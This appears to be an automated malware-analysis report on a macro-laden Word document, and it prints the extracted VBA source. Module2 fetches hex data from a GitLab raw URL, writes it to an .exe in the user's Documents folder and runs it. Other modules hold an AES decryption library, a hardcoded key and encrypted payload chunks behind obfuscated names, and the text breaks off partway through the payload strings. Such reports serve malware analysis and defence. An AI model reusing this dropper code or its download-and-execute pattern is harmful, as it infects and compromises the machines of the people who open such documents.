Has Summary Info:
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Title:
Subject:
Author:	ADMIN
Keywords:
Comments:
Template:	Normal
Last Saved By:	Victim
Revion Number:	27
Total Edit Time:	1740
Create Time:	2024-12-16 06:28:00
Last Saved Time:	2024-12-16 10:19:00
Number of Pages:	1
Number of Words:	3
Number of Characters:	18
Creating Application:	Microsoft Office Word
Security:	0

Document Summary

Document Code Page:	1252
Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 1128

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.bas
Stream Size:	1128
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < 4 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 ce 03 00 00 00 00 00 00 01 00 00 00 d4 44 12 16 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module1"
Public Sub CallTestAES()
    Dim kakensooe As New ViewSession
    kakensooe.ikwiwiejs_19293_Ade
    
End Sub

VBA File Name: Module2.bas, Stream Size: 4972

General
Stream Path:	Macros/VBA/Module2
VBA File Name:	Module2.bas
Stream Size:	4972
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . n . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 fa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 01 05 00 00 81 0e 00 00 00 00 00 00 01 00 00 00 d4 44 0d 70 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module2"
Option Explicit

' Function chuy?n hex thnh nh? phn (byte array)
Function HexToBinary(hexString As String) As Byte()
    Dim i As Long
    Dim length As Long
    Dim byteArray() As Byte

    length = Len(hexString) \ 2
    ReDim byteArray(length - 1)

    For i = 0 To length - 1
        byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
    Next i

    HexToBinary = byteArray
End Function

' Function t?i d? li?u hex t? URL
Function GetDataFromURL(url As String) As String
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")

    On Error Resume Next
    http.Open "GET", url, False
    http.Send
    
    If http.Status = 200 Then
        GetDataFromURL = http.responseText
    Else
        GetDataFromURL = ""
    End If
    
    On Error GoTo 0
    Set http = Nothing
End Function

' Sub luu file EXE t? d? li?u hex v ch?y
Sub DownloadAndRunEXE()
    Dim hexData As String
    Dim binaryData() As Byte
    Dim savePath As String
    Dim fileNum As Integer
    Dim i As Long

    ' Bu?c 1: T?i d? li?u hex t? URL
    hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up") ' Thay URL b?ng link th?c t?

    If hexData = "" Then
        MsgBox "Khng t?i du?c d? li?u t? URL.", vbCritical, "L?i"
        Exit Sub
    End If

    ' Bu?c 2: Chuy?n hex thnh nh? phn
    binaryData = HexToBinary(hexData)

    ' Bu?c 3: Luu d? li?u thnh file EXE
    savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
    fileNum = FreeFile
    
    Open savePath For Binary As #fileNum
    For i = LBound(binaryData) To UBound(binaryData)
        Put #fileNum, , binaryData(i)
    Next i
    Close #fileNum

    ' Bu?c 4: Ki?m tra file v ch?y
    If Len(Dir(savePath)) > 0 Then
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
        
        ' Ch?y file EXE
        shell.Run """" & savePath & """", 1, False
        MsgBox "File EXE d du?c t?i v ch?y thnh cng!", vbInformation, "Thnh cng"
    Else
        MsgBox "Khng th? t?o file EXE.", vbCritical, "L?i"
    End If
End Sub

VBA File Name: Module3.bas, Stream Size: 48244

General
Stream Path:	Macros/VBA/Module3
VBA File Name:	Module3.bas
Stream Size:	48244
Data ASCII:	. . . . . 4 . . . C . . . . . . . . . . C . . . . . . . . . . . . D . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B C r
Data Raw:	01 16 03 00 00 34 05 00 00 be 43 00 00 18 05 00 00 1c 06 00 00 ff ff ff ff c6 43 00 00 fe 94 00 00 08 00 00 00 01 00 00 00 d4 44 f8 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 9e 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 a4 02 50 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module3"
'--- mdAesCtr.bas
Option Explicit
DefObj A-Z

#Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)

'=========================================================================
' API
'=========================================================================

#If Win64 Then
    Private Const PTR_SIZE                  As Long = 8
#Else
    Private Const PTR_SIZE                  As Long = 4
#End If

#If HasPtrSafe Then
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#Else
Private Enum LongPtr
    [_]
End Enum
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#End If
#If Not ImplUseShared Then
    #If HasPtrSafe Then
    Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #Else
    Private Declare Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
    Private Declare Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
    #End If
#End If

'=========================================================================
' Constants and member variables
'=========================================================================

Private Const AES_BLOCK_SIZE        As Long = 16
Private Const AES_KEYLEN            As Long = 32                    '-- 32 -> AES-256, 24 -> AES-196, 16 -> AES-128
Private Const AES_IVLEN             As Long = AES_BLOCK_SIZE
Private Const KDF_SALTLEN           As Long = 8
Private Const KDF_ITER              As Long = 10000
Private Const KDF_HASH              As String = "SHA512"
Private Const HMAC_HASH             As String = "SHA256"
Private Const OPENSSL_MAGIC         As String = "Salted__"          '-- for openssl compatibility
Private Const OPENSSL_MAGICLEN      As Long = 8
Private Const ERR_UNSUPPORTED_ENCR  As String = "Unsupported encryption"
Private Const ERR_CHUNKED_NOT_INIT  As String = "AES chunked context not initialized"

Private Type UcsCryptoContextType
    hPbkdf2Alg          As LongPtr
    hHmacAlg            As LongPtr
    hHmacHash           As LongPtr
    HashLen             As Long
    hAesAlg             As LongPtr
    hAesKey             As LongPtr
    AesKeyObjData()     As Byte
    AesKeyObjLen        As Long
    Nonce(0 To 3)       As Long
    EncrData()          As Byte
    EncrPos             As Long
    LastError           As String
End Type

Private m_uChunkedCtx           As UcsCryptoContextType

'=========================================================================
' Functions
'=========================================================================

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sText}.file -a`
Public Function AesEncryptString(sText As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sError          As String
    
    baData = ToUtf8Array(sText)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
        Call RtlGenRandom(baSalt(0), KDF_SALTLEN)
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    If Not IsArray(Password) Then
        ReDim Preserve baData(0 To UBound(baData) + PREFIXLEN) As Byte
        If UBound(baData) >= PREFIXLEN Then
            Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)
        End If
        Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)
        Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)
    End If
    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)
End Function

'--- equivalent to `openssl aes-256-ctr -pbkdf2 -md sha512 -pass pass:{Password} -in {sEncr}.file -a -d`
Public Function AesDecryptString(sEncr As String, Optional Password As Variant) As String
    Const PREFIXLEN     As Long = OPENSSL_MAGICLEN + KDF_SALTLEN
    Dim baData()        As Byte
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim sMagic          As String
    Dim sError          As String
    
    baData = FromBase64Array(sEncr)
    baPass = vbNullString
    baSalt = vbNullString
    If Not IsArray(Password) Then
        If Not IsMissing(Password) Then
            baPass = ToUtf8Array(Password & vbNullString)
        End If
        If UBound(baData) >= PREFIXLEN - 1 Then
            sMagic = String$(OPENSSL_MAGICLEN, 0)
            Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)
            If sMagic = OPENSSL_MAGIC Then
                ReDim baSalt(0 To KDF_SALTLEN - 1) As Byte
                Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)
                If UBound(baData) >= PREFIXLEN Then
                    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)
                    ReDim Preserve baData(0 To UBound(baData) - PREFIXLEN) As Byte
                Else
                    baData = vbNullString
                End If
            End If
        End If
    Else
        baKey = Password
    End If
    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error:=sError) Then
        Err.Raise vbObjectError, , sError
    End If
    AesDecryptString = FromUtf8Array(baData)
End Function

Public Function AesCryptArray(             baData() As Byte,             Optional Password As Variant,             Optional Salt As Variant,             Optional key As Variant,             Optional ByVal KeyLen As Long,             Optional Error As String,             Optional Hmac As Variant) As Boolean
    Const VT_BYREF      As Long = &H4000
    Dim uCtx            As UcsCryptoContextType
    Dim vErr            As Variant
    Dim bHashBefore     As Boolean
    Dim bHashAfter      As Boolean
    Dim baPass()        As Byte
    Dim baSalt()        As Byte
    Dim baKey()         As Byte
    Dim baTemp()        As Byte
    Dim lPtr            As LongPtr
    
    On Error GoTo EH
    If IsArray(Hmac) Then
        bHashBefore = (Hmac(0) <= 0)
        bHashAfter = (Hmac(0) > 0)
    End If
    If IsMissing(Password) Then
        baPass = vbNullString
    ElseIf IsArray(Password) Then
        baPass = Password
    Else
        baPass = ToUtf8Array(Password & vbNullString)
    End If
    If IsMissing(Salt) Then
        baSalt = baPass
    ElseIf IsArray(Salt) Then
        baSalt = Salt
    Else
        baSalt = ToUtf8Array(Salt & vbNullString)
    End If
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
        Error = uCtx.LastError
        GoTo QH
    End If
    If IsArray(Hmac) Then
        baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
        #If Win64 Then
            lPtr = PeekPtr(VarPtr(Hmac) + 8)
        #Else
            lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
        #End If
        If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
            lPtr = PeekPtr(lPtr)
        End If
        #If Win64 Then
            lPtr = PeekPtr(lPtr + 16)
        #Else
            lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
        #End If
        Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
    End If
    '--- success
    AesCryptArray = True
QH:
    pvCryptoAesCtrTerminate uCtx
    Exit Function
EH:
    vErr = Array(Err.Number, Err.Source, Err.Description)
    pvCryptoAesCtrTerminate uCtx
    Err.Raise vErr(0), vErr(1), vErr(2)
End Function

Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
    Dim baEmpty()       As Byte
    Dim baKey()         As Byte
    
    pvCryptoAesCtrTerminate m_uChunkedCtx
    baEmpty = vbNullString
    If IsArray(key) Then
        baKey = key
    End If
    If KeyLen <= 0 Then
        KeyLen = AES_KEYLEN
    End If
    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
End Function

Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
    If m_uChunkedCtx.hAesAlg = 0 Then
        m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
        Exit Function
    End If
    baOutput = baInput
    AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
    If Final Then
        pvCryptoAesCtrTerminate m_uChunkedCtx
    End If
End Function

Public Function AesChunkedGetLastError() As String
    AesChunkedGetLastError = m_uChunkedCtx.LastError
End Function

'= private ===============================================================

Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
    Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
    Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
    Dim hResult         As Long
    
    With uCtx
        '--- init member vars
        .EncrData = vbNullString
        .EncrPos = 0
        .LastError = vbNullString
        ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
        If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
            '--- generate RFC 2898 based derived key
            On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
            hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
            If hResult < 0 Then
                GoTo QH
            End If
            hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
            If hResult < 0 Then
                GoTo QH
            End If
            On Error GoTo 0
        End If
        '--- init AES key from first half of derived key
        On Error GoTo EH_Unsupported '--- CNG API missing on XP
        hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
        If hResult < 0 Then
            GoTo QH
        End If
        On Error GoTo 0
        hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
        If hResult < 0 Then
            GoTo QH
        End If
        ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
        hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        '--- init AES IV from second half of derived key
        Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
        '--- init HMAC key from last HashLen bytes of derived key
        hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
        If hResult < 0 Then
            GoTo QH
        End If
        hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
        If hResult < 0 Then
            GoTo QH
        End If
    End With
    '--- success
    pvCryptoAesCtrInit = True
    Exit Function
QH:
    uCtx.LastError = GetSystemMessage(hResult)
    Exit Function
EH_Unsupported:
    uCtx.LastError = ERR_UNSUPPORTED_ENCR
End Function

Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
    With uCtx
        If .hPbkdf2Alg <> 0 Then
            Call BCryptCloseAlgorithmProvider(.

VBA File Name: ViewSession.cls, Stream Size: 11978

General
Stream Path:	Macros/VBA/ViewSession
VBA File Name:	ViewSession.cls
Stream Size:	11978
Data ASCII:	. . . . . . . . . . . . . . . . 8 . . . ! . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . s 6 . M / ; L * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . * O N . . W . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . .
Data Raw:	01 16 03 00 00 00 01 00 00 1a 05 00 00 e4 00 00 00 38 02 00 00 ff ff ff ff 21 05 00 00 a9 1a 00 00 00 00 00 00 01 00 00 00 d4 44 d1 cf 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 73 dc 36 85 9d bd 0c 4d 90 2f 3b 89 99 e0 4c 85 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ViewSession"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public Sub ikwiwiejs_19293_Ade()
    Dim key As String
    Dim decryptedText As String
    Dim i As Integer
    Dim parts(1 To 60) As String
    Dim Oekksoioa_ As String
    Dim chunkSize As Integer
    Dim tempFilePath As String

    ' ?t kha AES
    key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
    part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
    part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
    part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
    part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
